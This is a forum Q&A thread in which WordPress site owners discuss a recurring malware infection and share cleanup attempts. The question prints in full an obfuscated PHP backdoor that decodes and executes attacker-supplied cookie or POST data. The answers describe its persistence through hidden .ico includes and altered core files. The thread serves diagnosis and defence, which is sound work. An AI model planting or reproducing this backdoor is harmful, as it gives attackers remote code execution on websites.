# What's the effect if this malware if infected your WP?

Tags: hacked

Just curious here and I need better understanding about this malware. Because their are websites are infected by this malware including my websites. But I can clean them all. Usually this malware written in strange name in .php  file, inside this file:

```
<?php
$hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$yiorkoj = Array();$yiorkoj[] = $hsexdir[11].$hsexdir[15].$hsexdir[28].$hsexdir[13].$hsexdir[31].$hsexdir[28].$hsexdir[17].$hsexdir[16].$hsexdir[20].$hsexdir[29].$hsexdir[11].$hsexdir[31].$hsexdir[2].$hsexdir[21].$hsexdir[29];$yiorkoj[] = $hsexdir[7].$hsexdir[22];$yiorkoj[] = $hsexdir[24].$hsexdir[27].$hsexdir[11].$hsexdir[6].$hsexdir[13].$hsexdir[13].$hsexdir[8].$hsexdir[24].$hsexdir[23].$hsexdir[3].$hsexdir[27].$hsexdir[24].$hsexdir[24].$hsexdir[23].$hsexdir[6].$hsexdir[16].$hsexdir[12].$hsexdir[24].$hsexdir[23].$hsexdir[13].$hsexdir[33].$hsexdir[11].$hsexdir[27].$hsexdir[23].$hsexdir[28].$hsexdir[28].$hsexdir[24].$hsexdir[8].$hsexdir[9].$hsexdir[27].$hsexdir[11].$hsexdir[30].$hsexdir[13].$hsexdir[27].$hsexdir[11].$hsexdir[28];$yiorkoj[] = $hsexdir[25];$yiorkoj[] = $hsexdir[11].$hsexdir[21].$hsexdir[20].$hsexdir[29].$hsexdir[31];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[17].$hsexdir[15].$hsexdir[28].$hsexdir[0].$hsexdir[28].$hsexdir[13].$hsexdir[31];$yiorkoj[] = $hsexdir[28].$hsexdir[18].$hsexdir[0].$hsexdir[5].$hsexdir[21].$hsexdir[27].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[20].$hsexdir[12].$hsexdir[19].$hsexdir[31].$hsexdir[15];$yiorkoj[] = $hsexdir[13].$hsexdir[15].$hsexdir[15].$hsexdir[13].$hsexdir[14].$hsexdir[17].$hsexdir[1].$hsexdir[28].$hsexdir[15].$hsexdir[10].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[5].$hsexdir[28].$hsexdir[29];$yiorkoj[] = $hsexdir[0].$hsexdir[13].$hsexdir[11].$hsexdir[4];foreach ($yiorkoj[8]($_COOKIE, $_POST) as $sgmcz => $tfbhhc){function ouvcux($yiorkoj, $sgmcz, $lcrwjj){return $yiorkoj[7]($yiorkoj[5]($sgmcz . $yiorkoj[2], ($lcrwjj / $yiorkoj[9]($sgmcz)) + 1), 0, $lcrwjj);}function jnlge($yiorkoj, $ysittw){return @$yiorkoj[10]($yiorkoj[1], $ysittw);}function njfgaru($yiorkoj, $ysittw){$epjvwf = $yiorkoj[4]($ysittw) % 3;if (!$epjvwf) {$oqkbtbd = $yiorkoj[0]; $qyzju = $oqkbtbd("", $ysittw[1]($ysittw[2]));$qyzju();exit();}}$tfbhhc = jnlge($yiorkoj, $tfbhhc);njfgaru($yiorkoj, $yiorkoj[6]($yiorkoj[3], $tfbhhc ^ ouvcux($yiorkoj, $sgmcz, $yiorkoj[9]($tfbhhc))));}
```

and that malware creates many index.php files in folders and also this malware adds code in index.php (real one), wp-config.php, and wp-setting.php. This malware changes the file permission of those infected files to 0755. Inside of this index.php (original and fake) and those original WP files there is an encrypted code of the destination directories to the other malware with .ico (extension) or favicon file.

May be expert can explain more.

Comment: I have been fighting this beast for almost a year across a half a dozen sites. This OP is the most concise description of what I've been dealing with. Even migration of "cleaned" websites to a newly setup VPS dedicated host hasn't stopped it. A few malware or virus scanners sometimes detect a little (in most cases NONE) of the malicious code - and where they do, they either quarantine or block access to the infected file, disabling the website completely. My attempt at combatting it at present employs file-change monitoring and crontab scripts which scan for and, where possible, quarantine the

Answer (score 1):

I'm also seeing this on a hosting place that has several WP installs. Cleaning them up (removing files that aren't supposed to be there, removing code) hasn't fixed things yet, it keeps coming back.

If you want to decode strings like that, use the https://www.unphp.net site. Use the recursive check button.

I've found bad code in wp-settings.php, wp-config.php, index.php, ico files (that start with a dot to make them hidden), random-name.php, rouge 500.php files inside the WP installs, and non-WP sites.

Not sure where the re-infection is coming from. Have reset credentials everywhere (hosting, ftp, WP users, etc) to no avail.

I think there might be some code inside the wp-posts table. Today's task is to look for that.

For your code, it evaluates (via the www.unphp.net site) to this; other infected files have the same eval of the obfusticated code:

```
<?php ?><div style="clear: both"></div>
</div>
<div id="foot">
<a href="<?php bloginfo('url'); ?>">Home</a><?php $pages = wp_list_pages('depth=1&title_li=&echo=0');
$pages2 = preg_split('/(<li[^>]*>)/', $pages);
foreach ($pages2 as $var) {
    echo str_replace('</li>', '', $var);
} ?> <br/>
Distributed by <a href="http://mondaydressing.com">Baju Grosiran</a><br/>
<?php wp_footer(); ?>
<?php $header_ads_act = get_theme_option('footer_ads_act1');
if (($header_ads_act == '') || ($header_ads_act == 'No')) { ?>
Copyright &#169; <?php echo date("Y") ?> <a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a><?php
} else { ?><?php echo get_theme_option('footer_ads1'); ?><?php
} ?>
</div>
</div>
</body>
</html><?
```

Still analyzing; will add to this answer as I find out more.

**Added**

The 'ico' files with a dot in front contain PHP code that also evaluates to the above code. There are `@include` commands in the modified files that point to those ico file so that the code inside will be executed.

**Added** 19 Oct 2019 630pm PST

Notices that there are many files, mostly index.php, that have permissions of 'execute' (755). That is an indicator of the file containing some obfusticated code (decoded via the site linked above).

Some of the decoded strings will point to the malware'd ICO file.

But all of the encoded strings decode to the above code.

Did find a couple of draft posts with author number '0' in one of the WP sites. But no indication of the malware's entry point yet.

**Added** 20 Oct 2019

Still have not found the source of the code insertions. I can clean the entire site (I think) and files are re-attacked the next day.

I've done all of the standard things, to no avail.

I'm building a program that will scan all files and look for files that may have been hacked; perhaps I am missing some.

The problem is made more complex by the server (dedicated VPS server at a hosting place) having multiple sites, WP and non-WP. All sites are being affected, with files randomly placed throughout all folders.

I'll figure this one out. Luckily, the sites are low-traffic. But it is not feasible to do a 'nuke'. I'll keep reporting here...

**Added 24 Oct 2019**

I've written a program that helps me identify possible hacked files based on their content. Not a true 'anti-virus' thing, but a good (IMHO) program to identify areas of concerns.

If you (or anyone else) interested, please contact me on my https://www.securitydawg.com site.

**Added 11 Nov 2019**

Site is still getting modified. The wp-settings/wp-config files, adding of the hidden ico files, random-named php files, and modified index.php (including index.php files where they shouldn't be).

Additional things done (in addition to above):

- Change permissions of the wp-config.php and wp-settings.php to 400 or
- Change the password of the WP database(s) to something very strong.
- Look at the wp-posts table for wp-content fields that are not normal 
  (like just a bunch of random numbers). Delete those entries. They
  will most likely be towards the end of the table, but look at every
  row.

We shall see how that works.

Comment: wow, that is enlightenment. As part of the WordPress user community, it's good for us to be more literate in the attacks that arise. So not only focus on developing the use of WordPress itself. Understanding malware or viruses that specifically attack WordPress is part of literacy. Anyway, thank you so much for your explanation, which makes me understand more about this malware.

Comment: So far, I've figured out that there is some process that is inserting the malware in the files. But I haven't figured out where it is coming from. <sigh> Hoping for ideas from others. See edited answer.

Comment: @jasaweb - please PM me directly - I have a program that might be useful in identifying hacked files. It's been useful on the one site that has been having continual problems (although not quite cleaned up yet). Contact me through the https://www.securitydawg.com site if you are interested.

Comment: ok, will contact you soon.

Answer (score -1):

I have the same issue and I have searched all over the internet for how to fix it. Literally read 50 google results just like this one, nobody has a solution other than nuke the sites. Paying 170 dollars or more for each site to clean this (services like Sucuri, Astra and such) is just too much, it would go into the thousands because I have 30 sites and some of them aren't even worth 170 bucks.

I literally clean these .ico files manually every morning along with some 8 letter php files like hgz8ag55.php totally random but always 8 letters. If I don't do that then it gets really nasty, redirects my traffic, inserts posts...

The only method that works is to do a complete reinstall of wordpress on a new blank database, then drop the tables and import the old database and then as quickly as possible download a clean backup of that and move it to a new clean server, because it will get reinfected otherwise. This is a very difficult process for 30 sites. I have moved 5 so far. It's amazing that the entire internet can't solve this problem :(